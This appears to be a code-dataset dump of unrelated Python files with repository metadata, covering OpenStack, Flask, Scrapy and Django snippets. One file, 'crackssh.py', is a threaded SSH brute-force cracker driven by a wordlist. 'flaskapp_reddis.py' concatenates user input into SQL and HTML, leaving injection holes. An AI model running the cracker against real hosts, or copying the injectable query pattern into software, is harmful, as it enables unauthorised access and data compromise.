parser = argparse.ArgumentParser(
description=("Save list of OpenStack cloud resources or compare "
"with previously saved list."))
parser.add_argument("--credentials",
type=argparse.FileType("r"),
metavar="<path/to/credentials.json>",
help="cloud credentials in JSON format")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("--dump-list",
type=argparse.FileType("w"),
metavar="<path/to/output/list.json>",
help="dump resources to given file in JSON format")
group.add_argument("--compare-with-list",
type=argparse.FileType("r"),
metavar="<path/to/existent/list.json>",
help=("compare current resources with a list from "
"given JSON file"))
args = parser.parse_args()
if args.credentials:
config = json.load(args.credentials)
else:
config = json.loads(subprocess.check_output(["rally", "deployment",
"config"]))
config.update(config.pop("admin"))
del config["type"]
if "users" in config:
del config["users"]
resources = CloudResources(**config)
if args.dump_list:
resources_list = resources.list()
json.dump(resources_list, args.dump_list)
elif args.compare_with_list:
given_list = json.load(args.compare_with_list)
changes = resources.compare(with_list=given_list)
removed, added = changes
# filter out expected additions
expected = []
for resource_tuple in added:
resource = dict(resource_tuple)
if ((resource["class"] == "keystone" and
resource["resource_name"] == "role" and
resource["name"] == "_member_") or
(resource["class"] == "nova" and
resource["resource_name"] == "security_group" and
resource["name"] == "default")):
expected.append(resource_tuple)
for resource in expected:
added.remove(resource)
if removed:
_print_tabular_resources(removed, "Removed resources")
if added:
_print_tabular_resources(added, "Added resources (unexpected)")
if expected:
_print_tabular_resources(expected, "Added resources (expected)")
if any(changes):
return 0 # `1' will fail gate job
return 0
if __name__ == "__main__":
sys.exit(main())
| 31.041344 | 79 | 0.60909 | 1,387 | 12,013 | 5.116078 | 0.235761 | 0.05637 | 0.085682 | 0.09301 | 0.212937 | 0.105271 | 0.101325 | 0.081877 | 0.060457 | 0.048337 | 0 | 0.001984 | 0.286606 | 12,013 | 386 | 80 | 31.121762 | 0.826021 | 0.124615 | 0 | 0.096774 | 0 | 0 | 0.086068 | 0.007676 | 0 | 0 | 0 | 0 | 0 | 1 | 0.193548 | false | 0 | 0.03629 | 0.137097 | 0.508065 | 0.024194 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
73c5fca4b05d55a87ba8fe8974efdfc3a6abf540 | 1,096 | py | Python | test/insert-encrypted.py | uvm-plaid/duet-sgx | 6a53508b7bb7754e6c31ab1dadc4ae48e7d84f16 | [
"MIT"
] | 4 | 2020-07-02T09:26:54.000Z | 2021-11-26T04:01:07.000Z | test/insert-encrypted.py | uvm-plaid/duet-sgx | 6a53508b7bb7754e6c31ab1dadc4ae48e7d84f16 | [
"MIT"
] | null | null | null | test/insert-encrypted.py | uvm-plaid/duet-sgx | 6a53508b7bb7754e6c31ab1dadc4ae48e7d84f16 | [
"MIT"
] | 2 | 2020-10-27T14:40:22.000Z | 2021-11-27T02:54:52.000Z | import json
import requests
import base64
import Crypto
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
from Crypto.Hash import SHA
#from Crypto import Random
#with open('/tmp/duetpublickey') as key_file:
# key_data=key_file.read()
key_data = requests.get("http://localhost:5000/pubkey")
key_json = key_data.json()
e = key_json['e']
n = key_json['n']
#print("Key Size (bits): " + str(key_json['size'] * 8))
#print("e: " + str(e))
#print("n: " + str(n))
#print("")
public_key = RSA.construct((long(n), long(e)))
print(public_key.exportKey())
message = "1,27"
# default hash Algorithm is SHA1, mask generation function is MGF1, no label is specified
# https://pycryptodome.readthedocs.io/en/latest/src/cipher/oaep.html
cipher = PKCS1_OAEP.new(public_key)
encrypted_message = base64.encodestring(cipher.encrypt(message)).replace("\n","")
data = { "value" : encrypted_message }
headers = { 'Content-type': 'application/json', 'Accept': 'application/json' }
requests.post('http://localhost:5000/insert', data=json.dumps(data), headers=headers)
#print(encrypted_message)
| 30.444444 | 89 | 0.729015 | 160 | 1,096 | 4.8875 | 0.46875 | 0.051151 | 0.043478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02045 | 0.107664 | 1,096 | 35 | 90 | 31.314286 | 0.779141 | 0.347628 | 0 | 0 | 0 | 0 | 0.168794 | 0 | 0 | 0 | 0 | 0.028571 | 0 | 1 | 0 | false | 0 | 0.368421 | 0 | 0.368421 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
73c83b791af6ab33697d10f7cddf574a8e966214 | 95 | py | Python | src/lesson_the_internet/http_cookies_setheaders.py | jasonwee/asus-rt-n14uhp-mrtg | 4fa96c3406e32ea6631ce447db6d19d70b2cd061 | [
"Apache-2.0"
] | 3 | 2018-08-14T09:33:52.000Z | 2022-03-21T12:31:58.000Z | src/lesson_the_internet/http_cookies_setheaders.py | jasonwee/asus-rt-n14uhp-mrtg | 4fa96c3406e32ea6631ce447db6d19d70b2cd061 | [
"Apache-2.0"
] | null | null | null | src/lesson_the_internet/http_cookies_setheaders.py | jasonwee/asus-rt-n14uhp-mrtg | 4fa96c3406e32ea6631ce447db6d19d70b2cd061 | [
"Apache-2.0"
] | null | null | null | from http import cookies
c = cookies.SimpleCookie()
c['mycookie'] = 'cookie_value'
print(c)
| 11.875 | 30 | 0.715789 | 13 | 95 | 5.153846 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147368 | 95 | 7 | 31 | 13.571429 | 0.82716 | 0 | 0 | 0 | 0 | 0 | 0.212766 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
73df3c0eb8fec2b7771ceae6cfb845c8b3b75d43 | 5,726 | py | Python | platon/beacon/main.py | shinnng/platon.py | 3197fac3839896290210da04dd0d45f0bdc731ce | [
"MIT"
] | null | null | null | platon/beacon/main.py | shinnng/platon.py | 3197fac3839896290210da04dd0d45f0bdc731ce | [
"MIT"
] | null | null | null | platon/beacon/main.py | shinnng/platon.py | 3197fac3839896290210da04dd0d45f0bdc731ce | [
"MIT"
] | null | null | null | from typing import (
Any,
Dict,
)
import requests
from platon.module import (
Module,
)
class Beacon(Module):
def __getattribute__(self):
raise ModuleNotFoundError('This module is not available')
# def __init__(
# self,
# base_url: str,
# session: requests.Session = requests.Session(),
# ) -> None:
# self.base_url = base_url
# self.session = session
#
# def _make_get_request(self, endpoint: str) -> Dict[str, Any]:
# url = self.base_url + endpoint
# response = self.session.get(url)
# response.raise_for_status()
# return response.json()
#
# # [ BEACON endpoints ]
#
# def get_genesis(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/beacon/genesis"
# return self._make_get_request(endpoint)
#
# def get_hash_root(self, state_id: str = "head") -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/states/{state_id}/root"
# return self._make_get_request(endpoint)
#
# def get_fork_data(self, state_id: str = "head") -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/states/{state_id}/fork"
# return self._make_get_request(endpoint)
#
# def get_finality_checkpoint(self, state_id: str = "head") -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/states/{state_id}/finality_checkpoints"
# return self._make_get_request(endpoint)
#
# def get_validators(self, state_id: str = "head") -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/states/{state_id}/validators"
# return self._make_get_request(endpoint)
#
# def get_validator(
# self, validator_id: str, state_id: str = "head"
# ) -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/states/{state_id}/validators/{validator_id}"
# return self._make_get_request(endpoint)
#
# def get_validator_balances(self, state_id: str = "head") -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/states/{state_id}/validator_balances"
# return self._make_get_request(endpoint)
#
# def get_epoch_committees(self, state_id: str = "head") -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/states/{state_id}/committees"
# return self._make_get_request(endpoint)
#
# def get_block_headers(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/beacon/headers"
# return self._make_get_request(endpoint)
#
# def get_block_header(self, block_id: str) -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/headers/{block_id}"
# return self._make_get_request(endpoint)
#
# def get_block(self, block_id: str) -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/blocks/{block_id}"
# return self._make_get_request(endpoint)
#
# def get_block_root(self, block_id: str) -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/blocks/{block_id}/root"
# return self._make_get_request(endpoint)
#
# def get_block_attestations(self, block_id: str) -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/blocks/{block_id}/attestations"
# return self._make_get_request(endpoint)
#
# def get_attestations(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/beacon/pool/attestations"
# return self._make_get_request(endpoint)
#
# def get_attester_slashings(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/beacon/pool/attester_slashings"
# return self._make_get_request(endpoint)
#
# def get_proposer_slashings(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/beacon/pool/proposer_slashings"
# return self._make_get_request(endpoint)
#
# def get_voluntary_exits(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/beacon/pool/voluntary_exits"
# return self._make_get_request(endpoint)
#
# # [ CONFIG endpoints ]
#
# def get_fork_schedule(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/config/fork_schedule"
# return self._make_get_request(endpoint)
#
# def get_spec(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/config/spec"
# return self._make_get_request(endpoint)
#
# def get_deposit_contract(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/config/deposit_contract"
# return self._make_get_request(endpoint)
#
# # [ DEBUG endpoints ]
#
# def get_beacon_state(self, state_id: str = "head") -> Dict[str, Any]:
# endpoint = f"/platon/v1/debug/beacon/states/{state_id}"
# return self._make_get_request(endpoint)
#
# def get_beacon_heads(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/debug/beacon/heads"
# return self._make_get_request(endpoint)
#
# # [ NODE endpoints ]
#
# def get_node_identity(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/node/identity"
# return self._make_get_request(endpoint)
#
# def get_peers(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/node/peers"
# return self._make_get_request(endpoint)
#
# def get_peer(self, peer_id: str) -> Dict[str, Any]:
# endpoint = f"/platon/v1/node/peers/{peer_id}"
# return self._make_get_request(endpoint)
#
# def get_health(self) -> int:
# endpoint = "/platon/v1/node/health"
# url = self.base_url + endpoint
# response = self.session.get(url)
# return response.status_code
#
# def get_version(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/node/version"
# return self._make_get_request(endpoint)
#
# def get_syncing(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/node/syncing"
# return self._make_get_request(endpoint)
| 36.941935 | 85 | 0.634125 | 720 | 5,726 | 4.793056 | 0.1125 | 0.056795 | 0.11359 | 0.140829 | 0.722689 | 0.722689 | 0.685598 | 0.676905 | 0.486236 | 0.320197 | 0 | 0.006282 | 0.221621 | 5,726 | 154 | 86 | 37.181818 | 0.768005 | 0.911107 | 0 | 0 | 0 | 0 | 0.077135 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.272727 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
73e7cc99e5e238a8edd516a69339fe1353523d3b | 702 | py | Python | polls/migrations/0002_auto_20211016_1704.py | vowatchka/fabrique_test_task | a876321c8c3c3197ce692f247af973432ebf84cf | [
"MIT"
] | null | null | null | polls/migrations/0002_auto_20211016_1704.py | vowatchka/fabrique_test_task | a876321c8c3c3197ce692f247af973432ebf84cf | [
"MIT"
] | null | null | null | polls/migrations/0002_auto_20211016_1704.py | vowatchka/fabrique_test_task | a876321c8c3c3197ce692f247af973432ebf84cf | [
"MIT"
] | null | null | null | # Generated by Django 2.2.10 on 2021-10-16 14:04
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('polls', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='choice',
options={'verbose_name': 'вариант ответа', 'verbose_name_plural': 'варианты ответов'},
),
migrations.AlterModelOptions(
name='poll',
options={'verbose_name': 'опрос', 'verbose_name_plural': 'опросы'},
),
migrations.AlterModelOptions(
name='question',
options={'verbose_name': 'вопрос', 'verbose_name_plural': 'вопросы'},
),
]
| 27 | 98 | 0.586895 | 64 | 702 | 6.28125 | 0.578125 | 0.164179 | 0.231343 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.039526 | 0.279202 | 702 | 25 | 99 | 28.08 | 0.754941 | 0.065527 | 0 | 0.315789 | 1 | 0 | 0.278287 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
73f447ffdf50a6143d323d43772047f678cd740a | 742 | py | Python | scrapy_crawler/crawler/spiders/base_crawler.py | Pradip-p/scrapy-py-crawler | 27ea73968fb16f30c883223ca35b229e4959911a | [
"MIT"
] | null | null | null | scrapy_crawler/crawler/spiders/base_crawler.py | Pradip-p/scrapy-py-crawler | 27ea73968fb16f30c883223ca35b229e4959911a | [
"MIT"
] | null | null | null | scrapy_crawler/crawler/spiders/base_crawler.py | Pradip-p/scrapy-py-crawler | 27ea73968fb16f30c883223ca35b229e4959911a | [
"MIT"
] | null | null | null | import os
import sys
import scrapy
from scrapy.crawler import CrawlerProcess
from twisted.internet import reactor
from scrapy.crawler import CrawlerRunner
from scrapy.utils.log import configure_logging
# from scrapy.loader import ItemLoader
from scrapy.utils.project import get_project_settings
from scrapy.loader import ItemLoader
from scrapy_crawler.lib.user_agent import get_user_agent
class LazyBaseCrawler(scrapy.Spider):
name = "scrapy_base_crawler"
allowed_domains = [""]
# START URLS for your project.
start_urls = ['']
# custom_settings
# = {
# # 'ITEM_PIPELINES': {
# # "lazy_crawler.crawler.pipelines.MongoPipeline": 300
# # },
| 24.733333 | 68 | 0.692722 | 83 | 742 | 6.024096 | 0.481928 | 0.14 | 0.102 | 0.092 | 0.168 | 0.168 | 0.168 | 0 | 0 | 0 | 0 | 0.005291 | 0.235849 | 742 | 29 | 69 | 25.586207 | 0.876543 | 0.243935 | 0 | 0 | 0 | 0 | 0.036538 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.714286 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
73f61d700e453d79966a445f88fa2b4d929fc22f | 1,694 | py | Python | sec/violent/codes/crackssh.py | imsilence/notes | 2e00f65f0d61fd077c589e0e9962b062bf591efc | [
"Apache-2.0"
] | null | null | null | sec/violent/codes/crackssh.py | imsilence/notes | 2e00f65f0d61fd077c589e0e9962b062bf591efc | [
"Apache-2.0"
] | null | null | null | sec/violent/codes/crackssh.py | imsilence/notes | 2e00f65f0d61fd077c589e0e9962b062bf591efc | [
"Apache-2.0"
] | null | null | null | #encoding: utf-8
import threading
import argparse
import sys
import pxssh
connect_lock = threading.Semaphore(value=10)
found_event = threading.Event()
def ssh_connect(host, port, user, password):
try:
_client = pxssh.pxssh()
_client.login(host, user, port=port, password=password)
_client.logout()
print '[+] username:%s, password:%s' % (user, password)
found_event.set()
return True
except BaseException as e:
#print '[-] %s, %s, %s' % (user, password, str(e))
return False
finally:
connect_lock.release()
def crack(host, port, wordbook):
fhandler = open(wordbook, 'rb')
for _line in fhandler:
if found_event.isSet():
break
try:
_user, _password = _line.strip().split()[:2]
connect_lock.acquire()
_th = threading.Thread(target=ssh_connect, args=(host, port, _user, _password))
_th.start()
except BaseException as e:
print str(e)
fhandler.close()
if __name__ == '__main__':
_parser = argparse.ArgumentParser()
_parser.add_argument('-T', '--target', help='crack target', default='localhost', type=str)
_parser.add_argument('-P', '--port', help='crack port', default=22, type=int)
_parser.add_argument('-W', '--wordbook', help='user & password workbook', type=str)
_args = _parser.parse_args()
if _args.wordbook is None or \
not os.path.exists(_args.wordbook) or \
not os.path.isfile(_args.wordbook):
_parser.print_help()
sys.exit(-1)
crack(_args.target, _args.port, _args.wordbook)
| 31.37037 | 95 | 0.600354 | 199 | 1,694 | 4.884422 | 0.437186 | 0.074074 | 0.052469 | 0.041152 | 0.055556 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005636 | 0.266824 | 1,694 | 53 | 96 | 31.962264 | 0.776973 | 0.03778 | 0 | 0.093023 | 0 | 0 | 0.078095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.139535 | 0.093023 | null | null | 0.069767 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
73f9db248d354d3ed3a8eb9c5faf88c2beed846b | 10,118 | py | Python | flaskapp_reddis.py | aishiyer18/Photo-Sharing-Network-on-Google-App-Engine | 8f9d4cd7e56cdb16a57706e25211c8fe7bf9484e | [
"Apache-2.0"
] | null | null | null | flaskapp_reddis.py | aishiyer18/Photo-Sharing-Network-on-Google-App-Engine | 8f9d4cd7e56cdb16a57706e25211c8fe7bf9484e | [
"Apache-2.0"
] | null | null | null | flaskapp_reddis.py | aishiyer18/Photo-Sharing-Network-on-Google-App-Engine | 8f9d4cd7e56cdb16a57706e25211c8fe7bf9484e | [
"Apache-2.0"
] | null | null | null | from flask import Flask, request, render_template, session, redirect, url_for, make_response
import MySQLdb, hashlib, os, redis
app = Flask(__name__)
app.secret_key = "1|D0N'T|W4NT|TH15|T0|3E|R4ND0M"
@app.route('/', methods=['POST','GET'])
def register():
if 'username' in session:
return render_template('index.html', username = session['username'])
if request.method == 'POST':
db = MySQLdb.connect("localhost","root","root","instagram")
cursor = db.cursor()
username = request.form['username']
password = request.form['password']
if(username == '' or password == ''):
return render_template('register.html')
sql = "select username from users where username='"+username+"'"
cursor.execute(sql)
if cursor.rowcount == 1:
return render_template('register.html')
sql = "insert into users (username, password) values ('"+username+"','"+hashlib.md5(password).hexdigest()+"')"
cursor.execute(sql)
db.commit()
cursor.close()
return render_template('login.html')
else:
return render_template('register.html')
@app.route('/login', methods=['POST','GET'])
def login():
if 'username' in session:
return render_template('index.html', username = session['username'])
if request.method == 'POST':
db = MySQLdb.connect("localhost","root","root","instagram")
cursor = db.cursor()
username = request.form['username']
password = request.form['password']
sql = "select username from users where username = '"+username+"' and password = '"+hashlib.md5(password).hexdigest()+"'"
cursor.execute(sql)
if cursor.rowcount == 1:
results = cursor.fetchall()
for row in results:
session['username'] = username
return render_template('index.html', username = session['username'])
else:
return render_template('login.html')
else:
return render_template('login.html')
@app.route('/logout', methods=['POST','GET'])
def logout():
if 'username' in session:
session.pop('username', None)
return redirect(url_for('register'))
@app.route('/upload', methods=['POST','GET'])
def upload():
if request.method == 'POST':
db = MySQLdb.connect("localhost","root","root","instagram")
cursor = db.cursor()
r = redis.StrictRedis(host='localhost', port=6379, db=0)
file = request.files['file']
file_contents = file.read()
hash = hashlib.md5(file_contents).hexdigest()
sql = "select name from images where username = '"+session['username']+"' and hash = '"+hash+"'"
cursor.execute(sql)
if cursor.rowcount > 0:
return render_template('index.html', username = session['username'])
sql = "insert into images (username, hash, name) values ('"+session['username']+"','"+hash+"','"+file.filename+"')"
cursor.execute(sql)
db.commit()
cursor.close()
key = session['username']+"_"+hash
r.set(key,file_contents)
return redirect(url_for('list'))
else:
return render_template('index.html', username = session['username'])
@app.route('/list', methods=['POST','GET'])
def list():
if 'username' not in session:
return render_template('register.html')
if request.method == 'GET':
db = MySQLdb.connect("localhost","root","root","instagram")
cursor = db.cursor()
r = redis.StrictRedis(host='localhost', port=6379, db=0)
sql = "select hash, name from images where username = '"+session['username']+"'"
cursor.execute(sql)
results = cursor.fetchall()
list = '<br><center><a href="login">Back</a></center><br>'
list += '<table border="1"><col width="200"><col width="325"><col width="200"><col width="250"><th>Name</th><th>Image</th><th>Owner</th><th>Options</th>'
for row in results:
hash = row[0]
name = row[1]
key = session['username']+"_"+hash
image = r.get(key)
image = image.encode("base64")
list += "<tr><td>"+name+"</td>"
list += "<td><center><img src='data:image/jpeg;base64,"+image+"' height='75%' width='75%'/></center></td>"
list += "<td><center>"+session['username']+"</center></td>"
list += "<td><a href='view?id="+hash+"&u="+session['username']+"'>View</a> "
list += "<a href='delete?id="+hash+"&u="+session['username']+"'>Delete</a> "
list += "<a href='download?id="+hash+"&u="+session['username']+"'>Download</a></td></tr>"
list += '</table>'
cursor.close()
return '''<html><head><title>Instagram</title><link rel="stylesheet" href="static/stylesheets/style.css"></head><body>'''+list+'''</body></html>'''
else:
return render_template('index.html', username = session['username'])
@app.route('/list_all', methods=['POST','GET'])
def list_all():
if 'username' not in session:
return render_template('register.html')
if request.method == 'GET':
db = MySQLdb.connect("localhost","root","root","instagram")
cursor = db.cursor()
r = redis.StrictRedis(host='localhost', port=6379, db=0)
sql = "select hash, name, username from images"
cursor.execute(sql)
results = cursor.fetchall()
list = '<br><center><a href="login">Back</a></center><br>'
list += '<table border="1"><col width="200"><col width="325"><col width="200"><col width="250"><th>Name</th><th>Image</th><th>Owner</th><th>Options</th>'
for row in results:
hash = row[0]
name = row[1]
username = row[2]
key = username+"_"+hash
image = r.get(key)
image = image.encode("base64")
list += "<tr><td>"+name+"</td>"
list += "<td><center><img src='data:image/jpeg;base64,"+image+"' height='75%' width='75%'/></center></td>"
list += "<td><center>"+username+"</center></td>"
list += "<td><a href='view?id="+hash+"&u="+username+"'>View</a> "
if username == session['username']:
list += "<a href='delete?id="+hash+"&u="+username+"'>Delete</a> "
list += "<a href='download?id="+hash+"&u="+username+"'>Download</a></td></tr>"
list += '</table>'
cursor.close()
return '''<html><head><title>Instagram</title><link rel="stylesheet" href="static/stylesheets/style.css"></head><body>'''+list+'''</body></html>'''
else:
return render_template('index.html', username = session['username'])
@app.route('/view', methods=['GET'])
def view():
if request.method == 'GET':
db = MySQLdb.connect("localhost","root","root","instagram")
cursor = db.cursor()
r = redis.StrictRedis(host='localhost', port=6379, db=0)
hash = request.args.get('id')
username = request.args.get('u')
sql = "select hash, name from images where username = '"+username+"' and hash = '"+hash+"'"
cursor.execute(sql)
results = cursor.fetchall()
view = '<br><center><a href="list">Back</a></center><br>'
view += '<table border="1"><col width="200"><col width="325"><th>Name</th><th>Image</th>'
for row in results:
hash = row[0]
name = row[1]
key = username+"_"+hash
image = r.get(key)
image = image.encode("base64")
view += "<tr><td>"+name+"</td>"
view += "<td><center><img src='data:image/jpeg;base64,"+image+"' height='75%' width='75%'/></center></td></tr>"
view += '</table><br><hr><br>'
view += "<div><form action='comment' method='post'><center>Comment on the image<br><br><textarea name='comment' rows='3' cols='50'></textarea><br><br><input type='hidden' name='username' value= '"+username+"'><input type='hidden' name='hash' value= '"+hash+"'><input type='submit' value='Comment'></center></form></div>"
sql = "select username, comment from comments where owner = '"+username+"' and hash = '"+hash+"'"
cursor.execute(sql)
results = cursor.fetchall()
view += '<table border="1"><col width="100"><col width="500"><th>Username</th><th>Comment</th>'
for row in results:
username = row[0]
comment = row[1]
view += "<tr><td>"+username+"</td>"
view += "<td>"+comment+"</td></tr>"
view += '</table><br><hr><br>'
cursor.close()
return '''<html><head><title>Instagram</title><link rel="stylesheet" href="static/stylesheets/style.css"></head><body>'''+view+'''</body></html>'''
else:
return render_template('index.html', username = session['username'])
@app.route('/comment', methods=['POST','GET'])
def comment():
if request.method == 'POST':
db = MySQLdb.connect("localhost","root","root","instagram")
cursor = db.cursor()
owner = request.form['username']
hash = request.form['hash']
username = session['username']
comment = request.form['comment']
sql = "insert into comments (username, hash, owner, comment) values ('"+username+"','"+hash+"','"+owner+"','"+comment+"')"
cursor.execute(sql)
db.commit()
cursor.close()
return redirect(url_for('view', id = hash, u = owner))
@app.route('/download', methods=['GET'])
def download():
if request.method == 'GET':
db = MySQLdb.connect("localhost","root","root","instagram")
cursor = db.cursor()
r = redis.StrictRedis(host='localhost', port=6379, db=0)
hash = request.args.get('id')
username = request.args.get('u')
sql = "select name from images where username = '"+username+"' and hash = '"+hash+"'"
cursor.execute(sql)
results = cursor.fetchall()
for row in results:
name = row[0]
key = username+"_"+hash
file_contents = r.get(key)
response = make_response(file_contents)
response.headers["Content-Disposition"] = "attachment; filename="+name
cursor.close()
return response
else:
return render_template('index.html', username = session['username'])
@app.route('/delete', methods=['GET'])
def delete():
if request.method == 'GET':
db = MySQLdb.connect("localhost","root","root","instagram")
cursor = db.cursor()
hash = request.args.get('id')
username = request.args.get('u')
sql = "delete from images where username = '"+username+"' and hash = '"+hash+"'"
cursor.execute(sql)
db.commit()
r = redis.StrictRedis(host='localhost', port=6379, db=0)
key = username+"_"+hash
r.delete(key)
sql = "delete from comments where owner = '"+username+"' and hash = '"+hash+"'"
cursor.execute(sql)
db.commit()
cursor.close()
return redirect(url_for('list'))
if __name__ == '__main__':
app.run(debug=True) | 35.254355 | 322 | 0.636687 | 1,332 | 10,118 | 4.798048 | 0.120871 | 0.049288 | 0.0532 | 0.030042 | 0.746988 | 0.728212 | 0.707088 | 0.649194 | 0.608512 | 0.571272 | 0 | 0.014029 | 0.140542 | 10,118 | 287 | 323 | 35.254355 | 0.720906 | 0 | 0 | 0.647577 | 0 | 0.035242 | 0.378199 | 0.113944 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044053 | false | 0.022026 | 0.008811 | 0 | 0.162996 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fb51067a179c22d4c7fd947f7c363437b2bccfe7 | 757 | py | Python | electrum_gui/common/coin/data.py | Umiiii/electrum | 9e822640680c20c69a69695c033e97605aafcdce | [
"MIT"
] | null | null | null | electrum_gui/common/coin/data.py | Umiiii/electrum | 9e822640680c20c69a69695c033e97605aafcdce | [
"MIT"
] | null | null | null | electrum_gui/common/coin/data.py | Umiiii/electrum | 9e822640680c20c69a69695c033e97605aafcdce | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from electrum_gui.common.basic.dataclass.dataclass import DataClassMixin
@dataclass
class ChainInfo(DataClassMixin):
chain_code: str # unique chain coin
fee_code: str # which coin is used to provide fee (omni chain uses btc, neo uses neo_gas etc.)
name: str # full name of chain
chain_id: str = None # optional, identify multi forked chains by chain_id (use by eth etc.)
@dataclass
class CoinInfo(DataClassMixin):
code: str # unique code
chain_code: str # which chain does it belong to
name: str # full name of coin
symbol: str # symbol of coin
decimals: int # decimals of coin
icon: str # icon url of coin
token_address: str = None # optional, used by tokens
| 29.115385 | 99 | 0.712021 | 111 | 757 | 4.783784 | 0.477477 | 0.052731 | 0.045198 | 0.056497 | 0.06403 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.228534 | 757 | 25 | 100 | 30.28 | 0.909247 | 0.420079 | 0 | 0.352941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.117647 | 0 | 0.882353 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
fb51c34c8f65efc91e78caed33602805fc278f48 | 876 | py | Python | proctor/tests/test_groups.py | rhornik-indeed/django-proctor | f78b6daaeed8e1ce1235d8abb94722ed84c50e8d | [
"Apache-2.0"
] | 11 | 2015-02-15T05:20:17.000Z | 2021-08-03T12:42:07.000Z | proctor/tests/test_groups.py | rhornik-indeed/django-proctor | f78b6daaeed8e1ce1235d8abb94722ed84c50e8d | [
"Apache-2.0"
